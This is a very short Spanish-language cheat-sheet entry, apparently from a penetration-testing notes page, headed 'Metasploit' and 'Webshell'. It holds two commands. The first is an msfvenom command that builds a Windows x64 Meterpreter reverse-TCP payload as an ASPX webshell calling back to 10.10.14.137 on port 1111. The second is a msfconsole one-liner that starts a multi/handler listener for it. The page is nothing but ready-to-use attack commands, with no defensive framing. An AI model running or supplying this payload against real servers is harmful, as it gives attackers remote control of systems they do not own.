Metasploit

Webshell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.137 LPORT=1111 -f aspx > rev.aspx

Ponerse en escucha

msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.14.137; set LPORT 1111; run"

Last updated